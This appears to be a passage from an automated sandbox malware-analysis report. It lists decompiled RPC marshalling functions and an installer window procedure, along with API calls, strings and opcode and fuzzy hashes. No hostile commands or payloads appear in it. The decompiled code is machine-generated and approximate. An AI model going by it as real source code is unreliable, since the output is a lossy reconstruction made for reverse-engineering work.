                                                                                                • Opcode Fuzzy Hash: c77135f87002b37bba7b2044ac27a6ca613594af9411f3590cf9dc31f9660cdf
                                                                                                • Instruction Fuzzy Hash: BA3118B5A00249AFCB04CF98D8A1AEF7BB5BF89301F148559FA559B244D331EB50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA52A0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _t43;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                                					E6EDA73B0(_a4 + 0x14, (_v8[1] & 0x000000ff) + 1);
                                                                                                					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                                						_v12 = _a12;
                                                                                                						_v16 =  *((intOrPtr*)(_v12 + 2));
                                                                                                						_a12 = _v12 + 6;
                                                                                                					} else {
                                                                                                						_v16 = _v8[2] & 0x0000ffff;
                                                                                                						_a12 =  &(_v8[4]);
                                                                                                					}
                                                                                                					E6EDAAF50(_a4, _v16);
                                                                                                					return E6EDAC570(_a4, _a8, _a12);
                                                                                                				} else {
                                                                                                					_t43 =  *_v8 & 0x000000ff;
                                                                                                					0x6eda0000("invalid format type %x\n", _t43);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return _t43;
                                                                                                				}
                                                                                                			}








                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA52F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 4640751bc7f1e877b67c68dbcc4aedacf9f4bee66625c3d92cdb7a275101c5aa
                                                                                                • Instruction ID: 9a7eab99e53e4ab3a8427dc083218bf16a8c67030cea197e1cd81dc2c8a90a56
                                                                                                • Opcode Fuzzy Hash: 4640751bc7f1e877b67c68dbcc4aedacf9f4bee66625c3d92cdb7a275101c5aa
                                                                                                • Instruction Fuzzy Hash: 512160B5A04148EFCB04CFDDD8909AE7BB6AF85205F14C198F9589B345E3309F20DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA6520(signed int _a4, signed char* _a8) {
                                                                                                				void* _t53;
                                                                                                				void* _t54;
                                                                                                
                                                                                                				0x6eda0000("(pStubMsg == ^%p, pFormat == ^%p)\n", _a4, _a8);
                                                                                                				_t54 = _t53 + 0xc;
                                                                                                				if(( *_a8 & 0x000000ff) != 0x22 && ( *_a8 & 0x000000ff) != 0x25) {
                                                                                                					0x6eda0000("Unhandled string type: %#x\n",  *_a8 & 0x000000ff);
                                                                                                					_t54 = _t54 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				if(( *_a8 & 0x000000ff) != 0x22) {
                                                                                                					E6EDAD650(0x25, _a4, _a8);
                                                                                                					E6EDADE30(0x25, _a4, _a8, 1);
                                                                                                				} else {
                                                                                                					E6EDAD650(0x22, _a4, _a8);
                                                                                                					E6EDADE30(0x22, _a4, _a8, 1);
                                                                                                				}
                                                                                                				return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA6582
                                                                                                Strings
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA6570
                                                                                                • (pStubMsg == ^%p, pFormat == ^%p), xrefs: 6EDA652B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-3846614787
                                                                                                • Opcode ID: 32eec9f59b2f760c69db160ef6d74da0b4d0c3b2d8c317f80c70bc79eab529cd
                                                                                                • Instruction ID: 849cacfa186914060d7ed9399c15b9cbea4a10ed1b0395dff3f317d7539233fb
                                                                                                • Opcode Fuzzy Hash: 32eec9f59b2f760c69db160ef6d74da0b4d0c3b2d8c317f80c70bc79eab529cd
                                                                                                • Instruction Fuzzy Hash: FF216F75600004BBE708DF9CD891EAE776ADB89304F00C019FE598F2C6D671EB918BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA3410(void* __ecx, signed int _a4, void* _a8, signed char* _a12, signed int _a16) {
                                                                                                				signed int _v8;
                                                                                                				void* _t51;
                                                                                                				void* _t52;
                                                                                                
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff, __ecx);
                                                                                                				_t52 = _t51 + 0x14;
                                                                                                				_t37 = _a12;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x11) {
                                                                                                					E6EDA73D0(_t37, _a4 + 4, 4);
                                                                                                					_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					E6EDAAF00(_a4, 4);
                                                                                                					_t52 = _t52 + 0x10;
                                                                                                				} else {
                                                                                                					_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					if(( *(_a4 + 0x20) & 0x000000ff) != 0 &&  *_a8 == 0) {
                                                                                                						0x6eda0000("NULL ref pointer is not allowed\n");
                                                                                                						_t52 = _t52 + 4;
                                                                                                						__imp__RpcRaiseException(0x6f4);
                                                                                                					}
                                                                                                				}
                                                                                                				E6EDAB580(_a4, _v8, _a8,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                				return 0;
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4), ref: 6EDA346B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%d)$NULL ref pointer is not allowed
                                                                                                • API String ID: 3997070919-1100665054
                                                                                                • Opcode ID: 6bcac07e8fa8e2e983060ca5d613a836230e4ce4320869ef7de2d349db8f09eb
                                                                                                • Instruction ID: 34cbb550d7f96c84721e7fd9b50903da157280010492d746ff9ad1ff906bd7b0
                                                                                                • Opcode Fuzzy Hash: 6bcac07e8fa8e2e983060ca5d613a836230e4ce4320869ef7de2d349db8f09eb
                                                                                                • Instruction Fuzzy Hash: D02162B5604148AFDB04CF98D840DAE77AAAB49344F04C558FE498B345E731EB10CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                				long _t22;
                                                                                                
                                                                                                				if(_a8 != 0x102) {
                                                                                                					if(_a8 != 0x200) {
                                                                                                						_t22 = _a16;
                                                                                                						L7:
                                                                                                						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                                                                                                							 *0x429fc0 = _t22;
                                                                                                							E0040592B(0x429fd8, 0x42f000);
                                                                                                							E00405889(0x42f000, _t22);
                                                                                                							E0040140B(6);
                                                                                                							E0040592B(0x42f000, 0x429fd8);
                                                                                                						}
                                                                                                						L11:
                                                                                                						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                                                                                                					}
                                                                                                					if(IsWindowVisible(_a4) == 0) {
                                                                                                						L10:
                                                                                                						_t22 = _a16;
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					_t22 = E00404598(_a4, 1);
                                                                                                					_a8 = 0x419;
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				if(_a12 != 0x20) {
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				E00403D29(0x413);
                                                                                                				return 0;
                                                                                                			}





                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00404C4F
                                                                                                • CallWindowProcA.USER32 ref: 00404CBD
                                                                                                  • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                                • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                                                                                • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                                • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6CE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: d90feab92f630bf4a61649687bd2a01710404bc033f1512af59186b6bd7e0f4d
                                                                                                • Instruction ID: 4615a577059ab70d21ad4c35d615337ebeecb26559deafc4e9d12f028067cae9
                                                                                                • Opcode Fuzzy Hash: d90feab92f630bf4a61649687bd2a01710404bc033f1512af59186b6bd7e0f4d
                                                                                                • Instruction Fuzzy Hash: FA1151B5A04148EBCB04CFDCD8909AE7BBAAF86245F148548F9658B345D731DF20DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA3F20(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
                                                                                                				void* _t25;
                                                                                                				void* _t38;
                                                                                                				void* _t39;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1c) {
                                                                                                					E6EDAD650(0x1c, _a4, _a12);
                                                                                                					E6EDAD830(_t25, _t38, _t39, 0x1c, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3F77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                                • API String ID: 3997070919-658257468
                                                                                                • Opcode ID: ff24f26eba3fc5ab63043668c8b6a9935520fa715676177c0ca83b8e5af25e33
                                                                                                • Instruction ID: f725d5fe702c2e0f9ab4d2c74114949e077b4c1ee3a68211fb94396609d80819
                                                                                                • Opcode Fuzzy Hash: ff24f26eba3fc5ab63043668c8b6a9935520fa715676177c0ca83b8e5af25e33
                                                                                                • Instruction Fuzzy Hash: A11161B26441496BEB04DFD8DC51FBB37AE9B89704F048418FA598B281D671DA108B71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA3E80(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
                                                                                                				void* _t24;
                                                                                                				void* _t37;
                                                                                                				void* _t38;
                                                                                                				void* _t39;
                                                                                                				void* _t40;
                                                                                                
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t40 = _t39 + 0x14;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x1b) {
                                                                                                					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
                                                                                                					_t40 = _t40 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				E6EDAD650(0x1b, _a4, _a12);
                                                                                                				E6EDAD830(_t24, _t37, _t38, 0x1b, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                                				return 0;
                                                                                                			}









                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3ED7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%d)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-1752923328
                                                                                                • Opcode ID: 553747771ea6898509e07ffe4e5ccd6ad77ea562ce3b16f6eeedf9972c64e5ab
                                                                                                • Instruction ID: 5cbb9990fa776a94c11f45081f2053148da88e9ad9b1a01522202cc70a92c747
                                                                                                • Opcode Fuzzy Hash: 553747771ea6898509e07ffe4e5ccd6ad77ea562ce3b16f6eeedf9972c64e5ab
                                                                                                • Instruction Fuzzy Hash: 971184B66041496BDB04CFD8DC51FFB37AE9B89704F048428FE598B2C1D671DA108B71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA1880(signed int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1c) {
                                                                                                					E6EDAD120(0x1c, _a4, _a8, _a12);
                                                                                                					E6EDAD360(0x1c, _a4, _a8, _a12, 1);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}




                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA18D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 160702f0d01921b051dc97ecb2ffb75a155de88f96577a479acbe2d366de5656
                                                                                                • Instruction ID: 3bf657cc60db02cea509c6a2b4215fa8c4e84cc886ec56a965ef34034295688e
                                                                                                • Opcode Fuzzy Hash: 160702f0d01921b051dc97ecb2ffb75a155de88f96577a479acbe2d366de5656
                                                                                                • Instruction Fuzzy Hash: 060144B6600149BFE704DFDCCC51EAB3799AB88744F00851CFA198B281E671EA118771
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDAB030(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                				intOrPtr _t34;
                                                                                                				void* _t58;
                                                                                                
                                                                                                				if( *((intOrPtr*)(_a4 + 4)) + _a12 <  *((intOrPtr*)(_a4 + 4)) ||  *((intOrPtr*)(_a4 + 4)) + _a12 >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                                					0x6eda0000("buffer overflow - Buffer = %p, BufferEnd = %p, size = %u\n",  *((intOrPtr*)(_a4 + 4)),  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)), _a12);
                                                                                                					_t58 = _t58 + 0x10;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				E6EDB0120( *((intOrPtr*)(_a4 + 4)), _a8, _a12);
                                                                                                				_t34 = _a4;
                                                                                                				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_t34 + 4)) + _a12;
                                                                                                				return _t34;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001), ref: 6EDAB08B
                                                                                                • _memmove.LIBCMT ref: 6EDAB0A0
                                                                                                Strings
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6EDAB079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u
                                                                                                • API String ID: 4056999889-1690444158
                                                                                                • Opcode ID: 4310b194f53939a4e2afc6045aabd8b565780225f64911e0ebaa9d1dfde8ad9a
                                                                                                • Instruction ID: b7d0acda6a51a7fd31386a5b122270b626474e0fcf7f0a218ad5ac93f1d49f8d
                                                                                                • Opcode Fuzzy Hash: 4310b194f53939a4e2afc6045aabd8b565780225f64911e0ebaa9d1dfde8ad9a
                                                                                                • Instruction Fuzzy Hash: 1E11C3B8200209AFCB08CF48C994DAABBA6FF88354B19C148FD594B356D731F991CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA17F0(signed int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				void* _t34;
                                                                                                				void* _t35;
                                                                                                
                                                                                                				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                                				_t35 = _t34 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x1b) {
                                                                                                					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
                                                                                                					_t35 = _t35 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				E6EDAD120(0x1b, _a4, _a8, _a12);
                                                                                                				E6EDAD360(0x1b, _a4, _a8, _a12, 1);
                                                                                                				return 0;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1842
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: bbbec2a8effd75e56de21b78aab10167cda2017debbf0370e0614cbcc26dcecf
                                                                                                • Instruction ID: 1a51817db6031431182f8fe089d4f67f6490f08f4c0839cadef3a79706ea4602
                                                                                                • Opcode Fuzzy Hash: bbbec2a8effd75e56de21b78aab10167cda2017debbf0370e0614cbcc26dcecf
                                                                                                • Instruction Fuzzy Hash: 150152B6600149ABE704DFDCDC51EAB37ADAB49744F008418FA198B281E671EA108BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA5410(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				signed char* _t21;
                                                                                                
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x1c) {
                                                                                                					E6EDACC40(0x1c, _a4, _a8, _a12);
                                                                                                					return E6EDACE70(0x1c, _a4, _a8, _a12, 1);
                                                                                                				}
                                                                                                				_t21 = _a12;
                                                                                                				0x6eda0000("invalid format type %x\n",  *_t21 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return _t21;
                                                                                                			}





                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5462
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 31f4a908f2a2a8291bbb409f94acd3e82d04141e5b2196721d99baa648b4f0d2
                                                                                                • Instruction ID: 4ad5e91062956ad6dd3d44980bbd9f10184ae24af0664e4fee20b749f4aab14a
                                                                                                • Opcode Fuzzy Hash: 31f4a908f2a2a8291bbb409f94acd3e82d04141e5b2196721d99baa648b4f0d2
                                                                                                • Instruction Fuzzy Hash: 620152B6640145BFEB04DFDDDC51EAB376DAB49705F048418FA198F281E671EA1087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA5380(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				void* _t33;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                                				_t34 = _t33 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x1b) {
                                                                                                					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
                                                                                                					_t34 = _t34 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				E6EDACC40(0x1b, _a4, _a8, _a12);
                                                                                                				return E6EDACE70(0x1b, _a4, _a8, _a12, 1);
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA53D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: 8cb4e7f5c6ab999f47dd7d428398fb9a34f763d951fb3a4f5dbf986d62a0fd60
                                                                                                • Instruction ID: b7fa96ef53d29652e3c2bb21d3e74ad3cced1b7db969df4be2dbbd65d855e938
